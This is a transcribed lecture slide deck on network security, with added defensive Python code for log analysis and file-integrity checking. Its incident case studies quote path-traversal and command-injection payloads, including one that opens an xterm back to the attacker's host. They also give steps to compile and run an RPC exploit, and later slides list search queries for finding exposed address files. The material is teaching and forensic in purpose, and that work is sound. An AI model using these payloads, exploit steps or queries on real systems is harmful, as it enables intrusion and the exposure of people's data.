Computer Networking and Security
Rudi Lumanto, STMIK Nusa Mandiri, November 2008
76 pages

Posted: Dec 12, 2015

Transcript
Page 1: Computer Network and Security

Computer Networking and Security

RUDI LUMANTO
STMIK NUSA MANDIRI
November 2008

Page 2: Computer Network and Security

References and Contact Info

- Glenn Berg, "Networking Essentials", New Riders
- Deborah Russell, G.T. Gangemi Sr., "Computer Security Basics", O'Reilly & Associates
- John E. Canavan, "Fundamentals of Network Security", Artech House
- internet

CONTACT: RUDI [email protected]
0815-1036-9754

Page 3: Computer Network and Security

ASSESSMENT CRITERIA

Assignments (2-4 reports): 20%
Midterm exam: 30%
Attendance: 10%
Final exam: 40%

Page 4: Computer Network and Security

SYLLABUS

- Overview
- Network standards (OSI)
- Network components
- Network protocol (TCP/IP)
- Network OS and services
- Network/Internet security

Page 5: Computer Network and Security

SYLLABUS (continued)

- Software threats: virus, worm, etc.
- Internet threats: TCP attack, DNS, DoS, etc.
- Firewall and Intrusion Detection System (IDS)
- Cryptography and its applications
- VPN

Page 6: Computer Network and Security

COMPUTER NETWORKING and SECURITY

OVERVIEW (course map)

- Network security standards
- Network components
- Protocol (TCP/IP)
- OS and network services
- Internet threats: TCP attack, DoS, DNS, etc.
- Software threats: virus, worm, etc.
- Firewall and IDS
- Cryptography and applications
- VPN

Page 7: Computer Network and Security

COMPUTER NETWORKING and SECURITY

1. OVERVIEW

Page 8: Computer Network and Security

Outline

- Simple cases and tools
- Why Computer Networking and why Security?
- Computer Security Goals
- Threats, Vulnerabilities, Attacks
- Policy and measure
- Making a good security policy

Page 9: Computer Network and Security

Simple case and tool (seeing the technique/information behind a case)

Page 10: Computer Network and Security

A Security Case

A company called "Acme-art Inc." does online business on the internet. They have a database that records all customer information, including credit card information, and it is connected to their site www.acme-art.com, which is protected by a firewall. On 31 October 2001 a hacker intruded into their system and stole all the credit card information, then posted it to a Usenet newsgroup. A few hours later the company had lost millions of dollars, suffered a bad reputation, and had to invest much more money to keep its business alive.

What happened? How could it have happened?

Fact: the firewall is installed, and internet access can only be done through HTTP port 80.

Page 11: Computer Network and Security

Security team investigation: Sample case 1

Looking for clues in the log file…

A
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET / HTTP/1.0" 200 3008
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /yf_thumb.jpg HTTP/1.0" 200 3452
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /fl_thumb.jpg HTTP/1.0" 200 8468
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /th_thumb.jpg HTTP/1.0" 200 6912
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /mn_thumb.jpg HTTP/1.0" 200 7891

B
10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /index.cgi?page=falls.shtml HTTP/1.0" 200 680
10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /falls.jpg HTTP/1.0" 200 52640
10.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /index.cgi?page=tahoel.shtml HTTP/1.0" 200 652
10.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /tahoel.jpg HTTP/1.0" 200 36580

C
10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /cgi-bin/ HTTP/1.0" 403 272

D
10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /index.cgi HTTP/1.0" 200 3008
10.0.1.21 - - [31/Oct/2001:03:05:31 +0530] "GET /index.cgi?page= HTTP/1.0" 200 358

E
10.0.1.21 - - [31/Oct/2001:03:06:21 +0530] "GET /index.cgi?page=/../../../../../../../../../etc/passwd HTTP/1.0" 200 358

F
10.0.1.21 - - [31/Oct/2001:03:07:01 +0530] "GET /index.cgi?page=|ls+-la+/%0aid%0awhich+xterm| HTTP/1.0" 200 1228
10.0.1.21 - - [31/Oct/2001:03:17:29 +0530] "GET /index.cgi?page=|xterm+-display+10.0.1.21:0.0+%26| HTTP/1.0" 200 1228

Page 12: Computer Network and Security

Security team investigation: Sample case 1

Part A in log file

10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET / HTTP/1.0" 200 3008
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /yf_thumb.jpg HTTP/1.0" 200 3452
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /fl_thumb.jpg HTTP/1.0" 200 8468
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /th_thumb.jpg HTTP/1.0" 200 6912
10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET /mn_thumb.jpg HTTP/1.0" 200 7891

Browsing …

Page 13: Computer Network and Security

Security team investigation: Sample case 1

Part B in log file

10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /index.cgi?page=falls.shtml HTTP/1.0" 200 680
10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /falls.jpg HTTP/1.0" 200 52640
10.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /index.cgi?page=tahoel.shtml HTTP/1.0" 200 652
10.0.1.21 - - [31/Oct/2001:03:03:18 +0530] "GET /tahoel.jpg HTTP/1.0" 200 36580

Browsing …

Page 14: Computer Network and Security

Security team investigation: Sample case 1

Part C in log file

10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /cgi-bin/ HTTP/1.0" 403 272

Trying direct access … error response

Page 15: Computer Network and Security

Security team investigation: Sample case 1

Part D in log file

10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /index.cgi HTTP/1.0" 200 3008
10.0.1.21 - - [31/Oct/2001:03:05:31 +0530] "GET /index.cgi?page= HTTP/1.0" 200 358

Attacking … Security hole 1

Page 16: Computer Network and Security

Security team investigation: Sample case 1 (Perl script)

Security hole 1: (missing) validation of the parameter variable that is passed to the index.cgi script

Page 17: Computer Network and Security

Security team investigation: Sample case 1

Part E in log file

10.0.1.21 - - [31/Oct/2001:03:06:21 +0530] "GET /index.cgi?page=/../../../../../../../../../etc/passwd HTTP/1.0" 200 358

Attacking … Security hole 1: recovering the passwd file

Page 18: Computer Network and Security

Security team investigation: Sample case 1

Passwd file

root:x:0:0:root:/root:/bin/bash
………………
Lion:x:500:500::/home/lion:/bin/bash

Security hole 1 effect: recovering the important "passwd" file

Page 19: Computer Network and Security

Security team investigation: Sample case 1

Part F in log file

10.0.1.21 - - [31/Oct/2001:03:07:01 +0530] "GET /index.cgi?page=|ls+-la+/%0aid%0awhich+xterm| HTTP/1.0" 200 1228
10.0.1.21 - - [31/Oct/2001:03:17:29 +0530] "GET /index.cgi?page=|xterm+-display+10.0.1.21:0.0+%26| HTTP/1.0" 200 1228

Attacking … Security hole 2: direct execution of server commands

Page 20: Computer Network and Security

Security team investigation: Sample case 1

10.0.1.21 - - [31/Oct/2001:03:17:29 +0530] "GET /index.cgi?page=|xterm+-display+10.0.1.21:0.0+%26| HTTP/1.0" 200 1228
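The sequence in parts C to F can be picked out of the access log mechanically. The following is an added example, not code from the slides: a small Python analyser that parses Apache common-log-format lines, decodes the CGI query parameters the way the script saw them, and flags traversal and shell-metacharacter values plus 403 probes of the script directory. The log format and the detection regexes are my own assumptions; the sample input is the slide's own excerpt.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache/NCSA common log format: host ident user [time] "method target proto" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)$'
)

# Patterns applied to each URL-decoded parameter value (assumed here, not from the slides):
#  - "../" segments that step outside the document root (part E of the log)
#  - shell metacharacters that turn a file name into a command when a CGI script
#    hands the value to a Perl open() or to a shell (part F of the log)
CHECKS = [
    ("path-traversal", re.compile(r'(?:^|[/\\])\.\.(?:[/\\]|$)')),
    ("command-injection", re.compile(r'^\||\|$|[\n\r;`$]')),
]

def parse_line(line):
    """Split one log line into its fields; returns None for lines that do not match."""
    m = LOG_RE.match(line.strip())
    if m is None:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    url = urlsplit(rec["target"])
    rec["path"] = url.path
    # keep_blank_values keeps "page=" (the empty probe in part D) visible; parse_qsl
    # also turns '+' into spaces and decodes %xx, so the regexes see what the CGI saw
    rec["params"] = parse_qsl(url.query, keep_blank_values=True)
    return rec

def analyse(line):
    """Return the parsed record with a list of (label, param, value) findings."""
    rec = parse_line(line)
    if rec is None:
        return None
    findings = []
    for name, value in rec["params"]:
        for label, pattern in CHECKS:
            if pattern.search(value):
                findings.append((label, name, value))
    # a 403 on the script directory itself is the reconnaissance step in part C
    if rec["status"] == 403 and rec["path"].startswith("/cgi-bin"):
        findings.append(("cgi-probe", "", rec["path"]))
    rec["findings"] = findings
    return rec

def suspicious_hosts(lines):
    """Group findings by client address: {host: [(time, label, detail), ...]}."""
    report = {}
    for line in lines:
        rec = analyse(line)
        if rec is None or not rec["findings"]:
            continue
        for label, name, value in rec["findings"]:
            detail = f"{name}={value!r}" if name else value
            report.setdefault(rec["host"], []).append((rec["time"], label, detail))
    return report

# Sample input: the slide's log excerpt (one line from each of parts A to F).
SAMPLE_LOG = [
    '10.0.1.21 - - [31/Oct/2001:03:02:47 +0530] "GET / HTTP/1.0" 200 3008',
    '10.0.1.21 - - [31/Oct/2001:03:03:13 +0530] "GET /index.cgi?page=falls.shtml HTTP/1.0" 200 680',
    '10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /cgi-bin/ HTTP/1.0" 403 272',
    '10.0.1.21 - - [31/Oct/2001:03:05:31 +0530] "GET /index.cgi?page= HTTP/1.0" 200 358',
    '10.0.1.21 - - [31/Oct/2001:03:06:21 +0530] "GET /index.cgi?page=/../../../../../../../../../etc/passwd HTTP/1.0" 200 358',
    '10.0.1.21 - - [31/Oct/2001:03:07:01 +0530] "GET /index.cgi?page=|ls+-la+/%0aid%0awhich+xterm| HTTP/1.0" 200 1228',
    '10.0.1.21 - - [31/Oct/2001:03:17:29 +0530] "GET /index.cgi?page=|xterm+-display+10.0.1.21:0.0+%26| HTTP/1.0" 200 1228',
]

if __name__ == "__main__":
    for host, events in suspicious_hosts(SAMPLE_LOG).items():
        print(host)
        for when, label, detail in events:
            print(f"  {when}  {label:18} {detail}")
```

The empty "page=" probe in part D produces no finding on its own; it only becomes meaningful in context, which is why the report is grouped per client address.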

Page 21: Computer Network and Security

Information/technique behind the case

- Understanding about computers and networks
- Information about the target
- HTTP structure
- CGI/Perl
- Linux system and its commands

Page 22: Computer Network and Security

Httpd default file structure: what is the web site structure?

Lisv01
/ (root)
  home/
    u01/  u02/  u03/ …
      public_html/        (default user's directory)
  var/
    www/
      html/               (default document root)
    log/
      httpd/
  sbin/  bin/  dev/
  etc/
    httpd/
      conf/
        httpd.conf *
    init.d/
      httpd *
  usr/ …

Document root: the directory that holds HTML documents. Entries marked * are files.

Page 23: Computer Network and Security

Behind the Web

Client-side application: WWW browser ↔ Internet/Intranet ↔ WWW server (server software serving HTML and script). The browser executes the application, e.g. JavaScript.

Network-loading application: the application is loaded from the WWW server over the Internet/Intranet and executed in the browser, e.g. Java applet, ActiveX.

Server-side application: the WWW server software executes the application and returns the result to the browser, e.g. CGI, Active Server Pages.

Page 24: Computer Network and Security

Sample case 2

Page 25: Computer Network and Security

Sample case 2

After a period of new recruitment, a server in a company suddenly crashed. The company network became unavailable for a while, which led to a large loss in production.

What happened? How could it have happened?

No log file indication!!!

Page 26: Computer Network and Security

Security team investigation: looking for clues by social engineering

Sample case 2

One new employee installed Windows 2000 Server on his computer and connected it to the LAN with a global IP address.

Other clues:
1. Nessus report on vulnerabilities in Windows 2000
2. Exploit program available

Analysis of host: Nessus report on Windows 2000 Server after IIS installation

Address of Host   Port/Service             Issue regarding port
192.168.27.31     ftp (21/tcp)             Security hole found
192.168.27.31     smtp (25/tcp)            Security hole found
192.168.27.31     http (21/tcp)            Security hole found
192.168.27.31     nntp (119/tcp)           Security hole found
192.168.27.31     msrpc (135/tcp)          Security hole found
192.168.27.31     netbios-ssn (139/tcp)    Security not found
192.168.27.31     https (443/tcp)          Security not found
192.168.27.31     microsoft-ds (445/tcp)   Security hole found
……                ….                       ….

Page 27: Computer Network and Security

NESSUS report in detail

Sample case 2

Vulnerability msrpc (135/tcp): The remote host is running a version of Windows which has a flaw in its RPC interface which may allow an attacker to execute arbitrary code and gain SYSTEM privileges. There is at least one WORM which is currently exploiting this vulnerability, namely the MSBlaster worm.
Solution: see http://www.microsoft.com/technet/security/bulletin/MS03-026.mspx
Risk factor: high
CVE: CAN-2003-0352
BID: 8205
Other references: IAVA:2003-A-0011
NESSUS ID: 11806

Warning msrpc (135/tcp): Distributed Computing Environment (DCE) services running on the remote host
Other references: IAVA:2003-A-0012
NESSUS ID: 11835

Page 28: Computer Network and Security

NESSUS ID: identity number of the vulnerability check by NESSUS
BID: Bugtraq ID: related documentation regarding the vulnerability, including exploit code; see the SecurityFocus site

Sample case 2

Simulation

1. Downloading the exploit source file (from the SecurityFocus site or the Whoppix CD)
   $cp /KNOPPIX/pentest/exploits/securityfocus/8205/oc192-dom.c
2. Compiling the source file
   $gcc oc192-dom.c
3. Executing the exploit against the IP of the target machine
   $a.out -d 192.168.94.204

Get the system access
C:>WINNT\SYSTEM32\

Page 29: Computer Network and Security

Information/technique behind the case

- Understanding about networks
- Insufficient security orientation for new employees
- Lack of knowledge about the OS
- There is always exploit code on the internet
- Lack of information about updates

Page 30: Computer Network and Security

Why Computer Network?

1. File sharing: enables access to a file at any time and from anywhere
2. Effective data transfer: sending data quickly and efficiently
3. Hardware sharing: one printer, hard disk, etc. can be shared
4. Realtime communication: communicating via text, audio, images or video in real time
5. Operational cost reduction: reducing the cost of telephone calls, paper use, mailing letters, etc.

Page 31: Computer Network and Security

File/information resource sharing

Information resources: printer, data, files

Users can share a printer connected to the LAN. There is no need to connect a printer to each computer.

Users can share data on the computers. A user on computer C can handle files on computer B as if they were his own files.

Page 32: Computer Network and Security

Effective data transfer

- The data transmission speed is scores to several hundred Mbps. For example, an A4-sized document (30 Kbytes) can be transmitted over a LAN in 0.024 second.

bps (bits per second) = a unit rate at which data can be transmitted over a communication line, expressed as the number of bits transmitted per second. 9600 bps means 9600 bits are transmitted in one second.

Page 33: Computer Network and Security

Hardware sharing

- Effective use of hardware (printer, hard disk, etc.)
- Easy to add new computers or relocate existing computers
- Easy to connect to computers of different vendors

Page 34: Computer Network and Security

Example of network use: Seat Reservation Network

- Inquiries are issued from various places
- Connected to the seat reservation database on the central computer
- Answers to inquiries are generated immediately
- Also used in updating databases and issuing a ticket

Examples of similar systems: money withdrawal, balance inquiry, etc.

Page 35: Computer Network and Security

Type of Network

Mainly divided into 2 types based on their scale (the area that a network covers).

LAN is implemented within a building or factory.

WAN is implemented by connecting two or more LANs between offices and laboratories, or between two countries.

Page 36: Computer Network and Security

Why Computer Security?

- To protect company/individual assets: hardware, software and INFORMATION (data, ability and reputation)
- To gain a competitive advantage: how many people would use a bank's internet banking system if they knew that the system had been hacked in the past?
- To comply with regulatory requirements
- To keep your job

Page 37: Computer Network and Security

Computer Security Goals

- Confidentiality
- Integrity
- Availability

Confidentiality: prevention of unauthorized access to data, and of accidental data disclosures.

Integrity: prevention of improper modifications of the data, either intentionally or accidentally. 1) Modification of the data by unauthorized parties. 2) Operation on data by authorized personnel in ways that are incompatible with the nature (syntax) of the data, leading to its corruption. 3) Any modification to append-only records, to alter their evidence value.

Availability: measures to protect data should not result in making it difficult to access and modify the data in the ways in which it was intended.

Page 38: Computer Network and Security

Threats, Vulnerabilities and Attacks

THREATS: anything that can disrupt the operation, functioning, integrity or availability of a computer system.

- Stand-alone threats: threats that arise without any connection to other systems. Ex: virus, password cracker
- Connection threats: threats that arise because of connection to other systems

Page 39: Computer Network and Security

◆ Threats arising from connection to other computers

- Information leaks: a database of customer information, including credit card numbers, is leaked from an Internet service provider.
- Falsification: the contents of the web site of a public institution are rewritten with the political messages of a dissident group.
- Denial of service: a bookshop site is attacked and its server goes down, discontinuing service.
- Impersonation: an intruder fakes a membership site for the purchase of merchandise.
- Attack platform: a corporate network administering a server used as a platform for attacking other sites was sued for compensation for the damage caused.

Page 40: Computer Network and Security

Vulnerabilities: weakness in the design, configuration or implementation of a computer system that renders it susceptible to a threat.

1. POOR DESIGN: hardware and software systems that contain design flaws that can be exploited. Ex: sendmail flaws in early versions of Unix that allowed hackers to gain privileged root access.

2. POOR IMPLEMENTATION: systems that are incorrectly configured because of inexperience, insufficient training or sloppy work. Ex: a system that does not have restricted access privileges on critical executable files.

3. POOR MANAGEMENT: inadequate procedures and insufficient checks and balances. Ex: no documentation and monitoring.

Page 41: Computer Network and Security

Critical Vulnerabilities and Vulnerability Scanning

Certain security vulnerabilities are declared critical when they are (or are about to be) actively exploited and represent a clear and present danger. Upon notification of a critical vulnerability, systems must be patched by a given date or they will be blocked from network access.

Page 42: Computer Network and Security

◆ Types of Vulnerability

OS/Program name | Cause | Influence
Index Server (Windows NT), Index Service (Windows 2000) | ISAPI extension idq.dll overflow | Local system permission seized by an outsider
telnetd (FreeBSD 4.3 and earlier, Red Hat 7.1 and earlier, etc.) | Buffer overflow during AYT optional packet processing | Telnetd permission (normally root) seized by an outsider
sadmind (Solaris 2.3 – 7) | Buffer overflow during NETMGT_PROC_SERVICE request processing | Command executable with root permission by an outsider
SSH 1.2.31, OpenSSH 2.2 and earlier | Overflow in an int variable in the detect_attack function | Command executable with root permission by an outsider
dtspcd (AIX 4.3/5.1, HP-UX 11.11, Solaris 8, etc.) | Buffer overflow in a shared library | Arbitrary command executable with root permission by an outsider
BIND 8.2.x (Red Hat, Turbolinux, Solaris, AIX, etc.) | Buffer overflow during TSIG processing | Operation permission (normally root) seized by an outsider
wu-ftpd 2.6.0 and earlier (Red Hat Linux 6.2 and earlier, etc.) | Format string bug in site-exec and setproctitle functions | Execution permission (normally root) seized by an outsider
IIS 4.0 (Windows NT), IIS 5.0 (Windows 2000) | Access to a file outside the root directory permitted when the path name is Unicode | Shell command executed with IUSR_Machinename permission by an outsider

Page 43: Computer Network and Security

ATTACKS: a specific technique used to exploit a vulnerability. Ex: a threat could be a denial of service, a vulnerability is in the design of the OS, and an attack could be a "ping of death".

- Passive attacks: gathering information by monitoring and recording traffic on the network, or by social engineering. Ex: packet sniffing, traffic analysis
- Active attacks: overt actions on the computer system.

Page 44: Computer Network and Security

◆ Denial of Service

Attack platform → Target host: service downed due to overload

• Large volume of data
• Packets causing a system down

Start attack!!

Page 45: Computer Network and Security

Policy and Measure

Security Trinity: the foundation for all security policies and measures that an organization develops and deploys.

What is Security? Definitions from the American Heritage Dictionary:
- Freedom from risk or danger: safety
- Measures adopted … to prevent a crime.

Security → Prevention

Computer Security Measures: mechanisms to prevent, detect and recover from threats and attacks, or for auditing purposes.

Page 46: Computer Network and Security

Key point

Computer Security is not only a technical problem, it is a business and people problem.

The technology is the easy part; the difficult part is developing a security policy/plan that fits the organization's business operation and getting people to comply with the plan.

Social engineering: non-technical methods hackers employ to gain access to a system; refers to the process of convincing a person to reveal information.

Page 47: Computer Network and Security

Security operations

- Prevention against accidental capture or modification of information
- Detection of all improper access to data and system resources
- Recovery from unauthorized access, restoring data values, system integrity, etc.

Policies and Procedures
- User privileges
- Data backup
- Security tools to deploy
- Monitoring the integrity
- Response to incidents
- User roles, etc.

Page 48: Computer Network and Security

◆ Types of Users

Hacker: a user who tries to obtain access using advanced knowledge and techniques.
Cracker: a user who attempts sabotage and other subversive activities with malicious motives.
Script kiddy: a user who has little technical capability and uses tools available on the Internet when attempting cyber attacks.

(Diagram: a corporate network with a vulnerability, facing intrusion, subversion and sabotage.)

Page 49: Computer Network and Security

◆ Integrity Check Tool

/etc/passwd file → hash value (MD5): dc577ef5f97b671781c04425737bc4df

File editing/falsification → new hash value: b0ed782bbd4c8445f07538a3ede788eb

Mismatch ... Altered!!
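The slide's check is a baseline hash compared against a fresh hash. As an added example (not a tool from the slides), the Python below builds a baseline for a set of files, re-verifies them and reports each as ok, altered or missing; the demo constructs a fake passwd file in a temporary directory, appends an entry and then deletes the file. SHA-256 is the assumed default; pass "md5" to reproduce the slide's algorithm.

```python
import hashlib
import os
import tempfile

def file_digest(path, algorithm="sha256"):
    """Hash a file in chunks so large files need not fit in memory."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def build_baseline(paths, algorithm="sha256"):
    """Record the known-good hash of each file.

    The baseline must be stored where the monitored host cannot rewrite it
    (read-only media or another machine); otherwise an intruder who edits
    /etc/passwd can simply update the stored hash too.
    """
    return {p: file_digest(p, algorithm) for p in paths}

def verify(baseline, algorithm="sha256"):
    """Re-hash every baselined file and report 'ok', 'altered' or 'missing' per path."""
    status = {}
    for path, expected in baseline.items():
        if not os.path.exists(path):
            status[path] = "missing"
        elif file_digest(path, algorithm) != expected:
            status[path] = "altered"
        else:
            status[path] = "ok"
    return status

def demo(algorithm="sha256"):
    """Constructed scenario mirroring the slide: baseline a fake passwd file, then tamper with it."""
    workdir = tempfile.mkdtemp()
    passwd = os.path.join(workdir, "passwd")
    with open(passwd, "w") as f:
        f.write("root:x:0:0:root:/root:/bin/bash\n"
                "lion:x:500:500::/home/lion:/bin/bash\n")
    baseline = build_baseline([passwd], algorithm)
    before = verify(baseline, algorithm)[passwd]
    # falsification: one appended line is enough to change the whole-file hash
    with open(passwd, "a") as f:
        f.write("extra:x:501:501::/home/extra:/bin/bash\n")
    after = verify(baseline, algorithm)[passwd]
    # removal is reported separately from modification
    os.remove(passwd)
    gone = verify(baseline, algorithm)[passwd]
    return before, after, gone

if __name__ == "__main__":
    print(demo("md5"))
```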

Page 50: Computer Network and Security

◆ Security Tools and Security Products

Countermeasures against hacking (a malicious user on the Internet versus the corporate network's servers/clients):

Network security
• Router (filtering)
• Firewall (VPN)
• N-IDS
• Vulnerability audit

Server security
• H-IDS
• Log monitoring
• Falsification prevention
• Vulnerability audit

Miscellaneous
• Virus scan
• Encryption (SSH)

Page 51: Computer Network and Security

◆ Firewall?

Internet ↔ firewall ↔ Intranet. A public WWW server and a public FTP server sit behind the firewall; clients reach them with ① HTTP, ② HTTP, ③ FTP, ④ HTTP and ⑤ unspecified applications (client/server, with authentication).

Gateway-type firewall:
• Packet filtering
• Application gateway
• Stateful inspection

Page 52: Computer Network and Security

◆ Encryption VPN (Virtual Private Network) = a "leased line" over the Internet, e.g. IPsec, IPv6

Remote access user and FW/VPN routers connect through Provider A, Provider B, Provider C and Provider D via the Internet IX; the communication between the FW/VPN endpoints is encrypted.

Page 53: Computer Network and Security

Making a good security policy

Page 54: Computer Network and Security

Making a good security policy

- Penetration test/ethical hacking: understanding what is inside the hacker's mind
- Security Trinity
- Security Goals

Page 55: Computer Network and Security

Definition of "Ethical Hacking"

Ethical hacking is where a computer and network expert attacks a security system on behalf of its owners, seeking vulnerabilities that a malicious hacker could exploit. To test a security system, ethical hacking uses the same methods as their less principled counterparts, but reports problems instead of taking advantage of them. Ethical hacking is also known as penetration testing, intrusion testing, and red teaming. Individuals involved in ethical hacking are sometimes called white hats, a term that comes from old Western movies, where the "good guy" wore a white hat and the "bad guy" wore a black hat. One of the first examples of ethical hacking at work was in the 1970s, when the United States government used groups of experts called red teams to hack its own computer systems. According to Ed Skoudis, Vice President of Security Strategy for Predictive Systems' Global Integrity consulting practice, ethical hacking has continued to grow in an otherwise lackluster IT industry, and is becoming increasingly common outside the government and technology sectors where it began. Many large companies, such as IBM, maintain employee teams of ethical hackers.

Page 56: Computer Network and Security

Inside the Hacker's Mind

- Focus on the target (successfully attack and save)
- Never use your own information
- Never leave your footsteps
- Can ever come back again

HACKERS PROCEDURE

Page 57: Computer Network and Security

Hackers Procedure/steps

1. Information gathering: targeting, scanning
2. Attack, intrusion: remote attack, local attack
3. Unauthorized act: space using, time stamp
4. Actions taken after the unauthorized act: log removing/deception, back door

Page 58: Computer Network and Security

Example of Targeting

All information about the target

Technique name: web browser targeting
Goals: personal information about the target
Operation base: any web browser with a search engine site (Google); online databases (WHOIS, IP conversion, etc.)

Location, related company/organization, news, telephone number, contact (mail address), web author ideas/thoughts/behaviour, site software

Page 59: Computer Network and Security

Targeting with Google

By using the basic search techniques combined with Google's advanced operators, anyone can perform information gathering and vulnerability searching using Google. This technique is commonly referred to as Google hacking.

Page 60: Computer Network and Security

Google hacking

Mastering Google using its standard options
– Double quotation …. to have a keyword recognized as a phrase
– Hyphen (-) …. if you want to exclude words containing the keyword
– site: …. searching only inside the site
– * …. wildcard. Use with double quotation to find any indicated word
– intitle: …. search limited only to the web title
– inurl: …. search limited only to the web page URL
– intext: …. search limited only to the main page of the web
– filetype: …. search focusing on the extension type of file
– phonebook: …. search telephone number

Page 61: Computer Network and Security

Google hacking: mastering Google using its options
– site: …. searching only inside the site

"hacker" site:www.cnn.com   or   site:www.cnn.com hacker

This query searches for the word hacker, restricting the search to the http://www.cnn.com web site. How many pages on the CNN web server contain the word hacker?

Page 62: Computer Network and Security

Google hacking: mastering Google using its options
– * …. wildcard. Use with double quotation to find any indicated word

"He is a * Hacker"

Page 63: Computer Network and Security

Google hacking: mastering Google using its standard options
– intitle: …. search limited only to the web title

intitle:"Hacker"

Page 64: Computer Network and Security

Google hacking: mastering Google using its standard options
– inurl: …. search limited only to the web page URL

inurl:www.securityfocus.com

Page 65: Computer Network and Security

Google hacking: mastering Google using its standard options
– intext: …. search limited only to the main page of the web

intext:"earthquake"

Page 66: Computer Network and Security

Google hacking: mastering Google using its standard options
– filetype: …. search focusing on the extension type of file

"hacking" filetype:ppt
"whoppix" filetype:iso

Page 67: Computer Network and Security

Google hacking: mastering Google using its standard options
– phonebook: …. search telephone number

phonebook:John Doe CA

Page 68: Computer Network and Security

More on Google hacking

Searching inside a site for content that was not actually meant to be exposed to the public

Finding directory listings on a server: directory listings provide a list of files and directories in a browser window instead of the typical text-and-graphics mix generally associated with web pages. These pages offer a great environment for deep information gathering.

Most directory listings begin with the phrase Index of, which also shows in the title. An obvious query to find this type of page might be

intitle:index.of

which may find pages with the term index of in the title of the document. Unfortunately, this query will return a large number of false positives, such as pages with the following titles:

Index of Native American Resources on the Internet
LibDex—Worldwide index of library catalogues
Iowa State Entomology Index of Internet Resources

Page 69: Computer Network and Security

More on Google hacking

Combining Google options in queries

Several alternate queries that provide more accurate results:

intitle:index.of "parent directory"
intitle:index.of name size

These queries indeed provide directory listings by not only focusing on index.of in the title, but on keywords often found inside directory listings, such as parent directory, name, and size. Obviously, this search can be combined with other searches to find files or directories located in directory listings.

Examples:

Name Last modified Size Description Parent Directory intitle:"Index of" intitle:"data"
Name Last modified Size Description Parent Directory intitle:"Index of" intitle:"data" intitle:bbs
bbs.dat inurl:"Index of" intitle:"Index of"

Page 70: Computer Network and Security

More on Google hacking

Example (screenshot of results): Name Last modified Size Description Parent Directory intitle:"Index of" intitle:"data"

Page 71: Computer Network and Security

More on Google hacking

Example (screenshot of results): Name Last modified Size Description Parent Directory intitle:"Index of" intitle:"data" intitle:bbs

Page 72: Computer Network and Security

More on Google hacking

Example (screenshot of results): bbs.dat inurl:"Index of" intitle:"Index of"

Page 73: Computer Network and Security

More on Google hacking

Example: searching for address databases of people written in CSV, focusing on Japanese sites

filetype:csv address site:jp

Page 74: Computer Network and Security

More on Google hacking

Example: searching for address databases of people written in Excel, focusing on UK sites

filetype:xls address site:uk

Page 75: Computer Network and Security

THANK YOU


Page 76: Computer Network and Security

The Dawn of the Net